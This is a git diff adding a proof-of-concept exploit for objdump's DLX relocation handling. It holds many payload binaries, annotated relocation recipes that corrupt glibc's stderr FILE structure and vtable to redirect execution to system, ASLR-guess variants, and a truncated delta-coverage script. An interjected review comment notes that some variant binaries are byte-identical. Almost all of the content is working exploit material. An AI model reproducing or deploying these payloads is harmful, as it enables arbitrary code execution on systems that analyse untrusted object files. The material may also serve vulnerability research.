+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin
new file mode 100644
index 0000000..05ff644
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes
new file mode 100644
index 0000000..ec4714e
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin
new file mode 100644
index 0000000..0666622
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes
new file mode 100644
index 0000000..84c8d98
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin
new file mode 100644
index 0000000..795cdee
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes
new file mode 100644
index 0000000..6932c59
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin
new file mode 100644
index 0000000..47f529f
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes
new file mode 100644
index 0000000..6fe7aff
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
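Review bot: The `.bin` that accompanies this notes file (blob 47f529f in the file header just above) carries the same blob id as `dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin`, so the `f06` payload is byte-identical to the `f05` one even though the two `.notes` files differ in `flag_byte4=0x06` versus `flag_byte4=0x05`. The same holds for the other `f06` binaries in this commit: d912cc4, 98a9e31, 08b387c, 050c5e9 and 05ff644 each repeat the blob id of their `f05` counterpart. That suggests `flag_byte4` is not encoded into the payload bytes at all, in which case the `f06` copies are redundant and the notes overstate what distinguishes them, or the generator emitted stale output; this should be confirmed against the generator before the notes are relied on as a description of the artifact. If the duplication is intentional, a README sentence such as `flag_byte4 selects a runner profile and does not change the .bin bytes` would keep readers from assuming the binaries differ.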
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin
new file mode 100644
index 0000000..d912cc4
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes
new file mode 100644
index 0000000..92b2353
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin
new file mode 100644
index 0000000..98a9e31
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes
new file mode 100644
index 0000000..653f33e
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin
new file mode 100644
index 0000000..08b387c
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes
new file mode 100644
index 0000000..a70a66f
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin
new file mode 100644
index 0000000..050c5e9
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes
new file mode 100644
index 0000000..db848c5
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin
new file mode 100644
index 0000000..05ff644
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes
new file mode 100644
index 0000000..a345387
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py
new file mode 100644
index 0000000..8f15052
--- /dev/null
+++ b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+from collections import Counter
+
+
+STDERR = 0x2044E0
+SYSTEM = 0x58750
+PAGE = 0x1000
+
+
+def be_from_le32(value):
+ return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big")
+
+
+def delta_for_base(base):
+ src = be_from_le32((base + STDERR) & 0xFFFFFFFF)
+ dst = be_from_le32((base + SYSTEM) & 0xFFFFFFFF)
+ return (dst - src) & 0xFFFFFFFF
+
+
+def main():
+ counts = Counter(delta_for_base(base) for base in range(0, 1 << 32, PAGE))
